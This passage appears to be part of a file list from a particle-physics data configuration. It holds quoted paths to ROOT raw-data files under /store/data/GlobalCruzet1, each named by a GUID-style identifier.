'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA174A3A-AF1C-DD11-BF8D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA1A101E-AD1C-DD11-A129-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AAA9E68F-9E1C-DD11-A380-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AC07D634-AF1C-DD11-8CDB-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/ACF22FB8-B91C-DD11-BA33-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AE39ADB2-B71C-DD11-B430-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AED27483-B31C-DD11-BAA1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B00336DD-A61C-DD11-8944-001617DBCF6A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B08F9CF7-A81C-DD11-90F4-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B0BFDCB7-B91C-DD11-AF2D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B20AE9D7-A41C-DD11-ABE8-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2382462-B11C-DD11-90FD-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B24F8173-B31C-DD11-835C-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2713B89-9E1C-DD11-B1B2-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B27A5B05-A91C-DD11-8492-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2BE5581-9E1C-DD11-AD50-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B400E66F-B31C-DD11-B0D7-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B649BBBA-A21C-DD11-9334-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B8FAEEAA-B71C-DD11-8B35-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BA0F0ED1-A61C-DD11-A33A-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BAE9B871-B31C-DD11-9BF0-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BC6B566C-9C1C-DD11-8154-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BCDBE12A-AB1C-DD11-AD5F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BE3A3B3D-981C-DD11-9A57-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BEEE307D-B31C-DD11-A4F8-000423D99AAA.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C014F777-B11C-DD11-B9DD-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FB9896-A01C-DD11-977A-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FDA089-9E1C-DD11-A3F0-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C23AF9D7-A41C-DD11-BA77-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C2CC26A6-B71C-DD11-89F4-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C4EEE3B3-B91C-DD11-85E5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C62A647C-9C1C-DD11-9136-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6708081-9E1C-DD11-8334-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6CF99B9-A21C-DD11-9D70-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C8086ACA-A41C-DD11-ABC6-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCB28CBF-A21C-DD11-A343-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCF1CF38-981C-DD11-B954-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CED1AE20-B81C-DD11-937A-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEE72F02-A91C-DD11-B45D-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEFC3E91-A01C-DD11-98CC-001617E30D0A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2885E89-9E1C-DD11-A1E6-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2B84A78-B61C-DD11-A238-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D42B50C4-A41C-DD11-BFB7-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D44B06B4-A21C-DD11-907F-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D464867B-9C1C-DD11-8980-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D4EBE6BA-A21C-DD11-B8A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D63FD683-9E1C-DD11-81FA-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D67A46C5-A21C-DD11-AE60-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6A13F4E-9A1C-DD11-A008-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6D813A1-A01C-DD11-A609-0019DB2F3F9B.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D814E871-B31C-DD11-9C71-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D83944BB-A21C-DD11-8862-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8469596-A01C-DD11-83F0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D86B334D-9A1C-DD11-B5DE-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8BB5636-981C-DD11-A230-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8E05E70-B31C-DD11-A757-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA16873D-9A1C-DD11-AE70-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA4142AD-B71C-DD11-9DAA-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAA952E9-B71C-DD11-815B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAC801D4-A41C-DD11-859E-000423D6B2D8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC0E836F-B31C-DD11-8C0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6A381B-AB1C-DD11-A583-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6BFCA3-B71C-DD11-A650-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC8E3F3D-9A1C-DD11-9FE1-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DE98753B-AF1C-DD11-A990-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E0EC4FE6-A61C-DD11-9AC0-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E210BBAD-B71C-DD11-9B75-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E4C16FD4-A61C-DD11-BCFE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E66F0446-AF1C-DD11-95F1-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E690BA1F-B81C-DD11-8302-001617C3B6DE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8002A9C-A01C-DD11-B643-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89041EC-A81C-DD11-9B7B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89EDDD2-A41C-DD11-A22C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8CFAD3D-981C-DD11-B22A-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EA2B3732-AD1C-DD11-9725-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAA9076D-9C1C-DD11-82A1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAACE083-B31C-DD11-88A3-000423D8F63C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EACE846B-9C1C-DD11-8AE5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAD127D4-A61C-DD11-A7F5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAED757C-9E1C-DD11-9717-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC1807DE-A61C-DD11-8881-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC3D0181-9E1C-DD11-B761-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC455A18-AB1C-DD11-8DDD-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC48C57A-9E1C-DD11-8E79-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FAF34-981C-DD11-8D58-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FF989-9E1C-DD11-B8B5-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F068CE9B-A01C-DD11-A90A-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F246A9A6-B71C-DD11-803B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F25A5A88-B11C-DD11-B4F2-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F274EE67-9C1C-DD11-A92E-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2D83EA9-B51C-DD11-89D5-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2DA1660-B11C-DD11-B258-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2E50819-AB1C-DD11-BB10-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F4039A71-9C1C-DD11-B3A2-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F899D8B7-B91C-DD11-9133-001617DBD540.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FAC2EFD0-A41C-DD11-A9D4-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FC879E74-B31C-DD11-B356-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA0CCC5-A21C-DD11-BE49-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA982D5-A61C-DD11-8A1F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCB68476-9C1C-DD11-B496-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCD38880-9E1C-DD11-829C-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE098EF7-A81C-DD11-A0AE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE134BB4-A21C-DD11-BDCC-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/000CD59C-CC1C-DD11-A498-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0095DE1B-C01C-DD11-975B-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/00D397C3-D01C-DD11-AAD7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0227DE52-C81C-DD11-910C-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/023E384A-C41C-DD11-B179-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/02A0A458-C41C-DD11-BDAE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0472A1D8-D21C-DD11-8A1F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0484A412-C01C-DD11-845D-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/060B4FA8-CE1C-DD11-9550-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/062E02B4-CE1C-DD11-9E2C-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/063C069C-CA1C-DD11-A395-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0664041F-C21C-DD11-A89C-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06DB5CC3-D01C-DD11-91CC-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06F29FCD-D01C-DD11-BC90-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/08FAD35A-C41C-DD11-AE05-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0AF3CEE5-BB1C-DD11-8E38-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C49504A-C41C-DD11-B41E-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C50A1D6-D01C-DD11-818F-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0CA1115F-C81C-DD11-BFC9-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E054203-C01C-DD11-AA43-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E14B5D2-B91C-DD11-8468-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/102F803D-C61C-DD11-9B28-000423D6CA72.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/108485A3-CE1C-DD11-B4E6-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10A6495F-C81C-DD11-9BAA-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10E92BE2-BB1C-DD11-9356-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/121C2B53-C61C-DD11-B128-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12B2969B-CC1C-DD11-AE14-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12D4A753-C81C-DD11-ACAA-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1459D199-CC1C-DD11-912B-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/14F7031F-C21C-DD11-84F6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/162C5398-CC1C-DD11-A72D-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/164BFF8D-CA1C-DD11-8932-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16937EE7-CC1C-DD11-B23B-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1695C71C-C01C-DD11-866E-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16D4ED53-C41C-DD11-8A8B-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16E75A61-C81C-DD11-8F7D-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181236C7-B91C-DD11-9101-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181B7712-C01C-DD11-A511-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/184F93F8-BB1C-DD11-843D-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/185F0E9E-CC1C-DD11-B1B4-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/186F2D03-C01C-DD11-9860-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18AC3F95-CA1C-DD11-8B7A-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18F04319-C21C-DD11-B16C-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1A3A8508-BE1C-DD11-AE08-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1AFB7BBB-D01C-DD11-8B27-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C006011-C21C-DD11-A5C9-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C2B095F-C81C-DD11-AA1F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C307446-C61C-DD11-850B-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C87B154-C41C-DD11-ABBA-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1EA987EF-BB1C-DD11-A499-000423D98FBC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1ED2084F-C61C-DD11-A76D-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2043E634-C21C-DD11-85CD-001617DBCF1E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/205468CD-D21C-DD11-8B1A-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2071A802-BE1C-DD11-B1E0-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220ABE65-C81C-DD11-9DF4-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220CC9F1-BB1C-DD11-9CC0-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/222FFF23-C21C-DD11-9C92-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/227EA1AD-CE1C-DD11-8133-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/229C872E-C21C-DD11-B263-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2403325F-C41C-DD11-887E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2606130A-C01C-DD11-9BA6-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26A522E2-BB1C-DD11-8605-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26AF8BF4-BD1C-DD11-92C0-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26F014F5-BB1C-DD11-9CDD-000423D33970.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/284795FB-BD1C-DD11-8134-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/28DAA6E5-BB1C-DD11-9497-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A629202-C01C-DD11-99AF-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A684F12-C01C-DD11-B52A-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2AC81D1E-C21C-DD11-9E3D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C06BFCE-D01C-DD11-ACBC-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C879CDF-BB1C-DD11-98B6-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2E5A7CD5-BB1C-DD11-8024-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EC3BB1E-C01C-DD11-B657-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFC81C8-D01C-DD11-BC93-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFCB33C-C61C-DD11-9BDE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30085D93-CC1C-DD11-95BF-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/300A34D7-B91C-DD11-B8B8-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30184FA3-CE1C-DD11-B135-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3022C499-CC1C-DD11-A9F3-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/306C0F0C-C01C-DD11-8997-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30AFFEA2-CE1C-DD11-9650-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B25C8A-CC1C-DD11-8F44-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B4DC4C-C41C-DD11-8D66-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32074B83-CA1C-DD11-A8A0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3279A90D-C01C-DD11-9288-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3288778F-CA1C-DD11-A8F8-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32D57812-C21C-DD11-80A8-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32E8D78D-CA1C-DD11-9B0C-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/342BF7D5-D21C-DD11-B3A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34AA2ED9-D21C-DD11-9434-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34B5B163-C41C-DD11-AB48-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34CA75D1-B91C-DD11-B4FD-000423D98930.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36191416-C21C-DD11-8A6C-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/362838EC-BD1C-DD11-B8C7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3636B1D0-BB1C-DD11-806E-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/366827C8-D01C-DD11-A7E9-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36F3E11D-C21C-DD11-A1AF-001617E30D52.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38032FF8-BF1C-DD11-BC36-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/383986EC-BB1C-DD11-987A-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38935E7E-CA1C-DD11-88E5-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FBE115-C01C-DD11-A373-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FEBD81-CA1C-DD11-8C28-000423D98804.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A207592-CA1C-DD11-9F1B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A914003-BE1C-DD11-B42F-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AC9A6A1-CC1C-DD11-9962-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AD17346-C61C-DD11-B4D1-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CA07EFF-BD1C-DD11-A85D-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CC33988-CA1C-DD11-A9EC-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3EA0B2D0-BB1C-DD11-A7F7-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/404FC1CE-D01C-DD11-84F5-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42A7E9D1-B91C-DD11-96A0-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42E5A594-CA1C-DD11-8E72-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4403FC5C-C81C-DD11-8187-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/44200AB3-CE1C-DD11-981F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/460369CC-D01C-DD11-9907-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46285A63-C41C-DD11-8F4C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4671328A-CC1C-DD11-9B21-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46E219D1-B91C-DD11-AE70-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46FBF8CE-D21C-DD11-A2EA-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48541196-CA1C-DD11-9E90-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/485816A4-CC1C-DD11-A10D-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4872EE1D-C01C-DD11-A5FD-000423D98C20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4885B4F9-BF1C-DD11-89B7-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48F3F2A2-CE1C-DD11-8DD4-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A06FFA1-CC1C-DD11-87A2-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A9CB82A-C21C-DD11-AEE7-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AD639F8-BB1C-DD11-AF29-000423D944F8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AFDEF53-C41C-DD11-A04C-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4C0DF65E-C41C-DD11-9D7F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4CB55298-CC1C-DD11-A393-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E3E253C-C61C-DD11-B716-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E55CAD7-B91C-DD11-9856-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EA7B5F5-BD1C-DD11-892C-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EB6F2E2-BB1C-DD11-B989-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EBAD914-C21C-DD11-9C60-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EE090E8-BB1C-DD11-BC09-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/500D4FD2-D01C-DD11-939D-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5094F75E-C41C-DD11-B213-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/50F25166-C81C-DD11-85F3-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5226D48D-CA1C-DD11-A560-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/529811ED-BB1C-DD11-B009-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5410534C-C41C-DD11-B43A-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54770146-C41C-DD11-9790-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/549CC491-CC1C-DD11-8EB2-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54EC00E7-BD1C-DD11-86E8-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5613B8D3-D21C-DD11-A49D-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/564941D8-D21C-DD11-B75D-001617C3B5D6.root',
